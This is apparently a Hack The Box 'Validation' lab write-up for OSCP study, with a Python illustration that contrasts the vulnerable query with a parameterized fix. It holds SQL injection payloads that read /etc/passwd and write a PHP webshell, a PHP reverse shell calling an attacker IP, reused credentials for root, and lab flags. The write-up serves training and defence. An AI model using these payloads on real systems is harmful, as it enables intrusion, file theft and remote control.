OSCP Study

Validation HTB Writeup

2023-03-08  doinb1517

Key points

1. SQL injection (append special characters to the parameters and read the error; when sqlmap finds nothing, don't give up, remember to inject by hand)

Writeup

User privileges

Start with an nmap scan

┌──(kali㉿192)-[~]
└─$ nmap -sC -sV 10.10.11.116                                           1 ⨯ 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-08 16:58 CST
Nmap scan report for 10.10.11.116
Host is up (0.26s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE       VERSION
22/tcp   open     ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open     http          Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open     http          nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.96 seconds

Port 80 serves a registration page

Registering several users to the same country displays every user in that country

Capture a request in Burp Suite

Throwing it straight into sqlmap gives nothing. Next, append ' to the username and country parameters and see whether an error comes back

Look closely at the error message; this is the spot to focus on

POST / HTTP/1.1
Host: 10.10.11.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://10.10.11.116
Connection: close
Referer: http://10.10.11.116/
Cookie: user=bbcee2843121a42fabb873a7f8fc337f
Upgrade-Insecure-Requests: 1

username=abbcc&country=payload' UNION SELECT database() -- +

The database name is registration

Continue by injecting for the table names

' UNION SELECT table_name from INFORMATION_SCHEMA.TABLES -- -

Try reading a file

' union select load_file("/etc/passwd")-- -

The web root is under /var/www, so we can write a webshell into /var/www/html

Try writing a file through the SQL injection

username=max&country=Andorra' union select "<?php echo system(@$_GET['cmd']); ?>" into outfile "/var/www/html/exp.php"; -- -
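As an added illustration (not code from the writeup or from the Validation box itself), the following Python models the injectable country lookup from the registration page next to its fixed form, using an in-memory SQLite table as a stand-in for the MySQL database; the table name, the sample users and the use of sqlite_master in place of INFORMATION_SCHEMA.TABLES are constructed assumptions.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the box's "registration" database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE registration (username TEXT, country TEXT)")
    conn.executemany(
        "INSERT INTO registration VALUES (?, ?)",
        [("alice", "Andorra"), ("bob", "Andorra"), ("carol", "Brazil")],
    )
    return conn


def users_in_country_vulnerable(conn, country):
    # The country value is concatenated into the SQL text, so a quote closes
    # the string literal and everything after it is parsed as SQL. This is the
    # pattern that lets "' UNION SELECT ..." append attacker-chosen rows.
    sql = "SELECT username FROM registration WHERE country = '" + country + "'"
    return [row[0] for row in conn.execute(sql)]


def users_in_country_hardened(conn, country):
    # Parameter binding sends the value separately from the query text, so
    # quotes and SQL keywords inside it are only characters of a country name.
    sql = "SELECT username FROM registration WHERE country = ?"
    return [row[0] for row in conn.execute(sql, (country,))]


# Same shape as the writeup's table-name payload; sqlite_master plays the
# role of INFORMATION_SCHEMA.TABLES here (assumption for the SQLite model).
PAYLOAD = "Andorra' UNION SELECT name FROM sqlite_master -- -"


def compare():
    conn = make_db()
    return {
        "vulnerable": sorted(users_in_country_vulnerable(conn, PAYLOAD)),
        "hardened": users_in_country_hardened(conn, PAYLOAD),
        "normal": users_in_country_hardened(conn, "Andorra"),
    }


if __name__ == "__main__":
    for name, rows in compare().items():
        print(f"{name}: {rows}")
```

The `into outfile` step on the page needs the same query fix plus MySQL-side hardening: run the web application's database account without the FILE privilege and keep `secure_file_priv` restricted, which blocks both `load_file()` and `INTO OUTFILE` even if an injection remains.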

The config file reveals the mysql username and password
<?php
  $servername = "127.0.0.1";
  $username = "uhc";
  $password = "uhc-9qual-global-pw";
  $dbname = "registration";

  $conn = new mysqli($servername, $username, $password, $dbname);
?>

There is a user htb; checked whether that user or root reuses the mysql password, and they don't. So fall back to a proper reverse shell: encode the php reverse shell below

php -r '$sock=fsockopen("10.10.14.9",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
GET /exp.php?cmd=%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d%66%73%6f%63%6b%6f%70%65%6e%28%22%31%30%2e%31%30%2e%31%34%2e%39%22%2c%31%32%33%34%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27 HTTP/1.1
Host: validation.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=2ffe4e77325d9a7152f7086ea7aa5114
Upgrade-Insecure-Requests: 1

User access obtained

$ cat user.txt
c0116910b5b342847a7b04c79ae00035

Root privileges

Simply tried the password from earlier and it gives root; this is the easiest privilege escalation I have ever seen

$ su root
Password: uhc-9qual-global-pw

id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
efd2fb1832a33de50b8ff07ec6ce255b
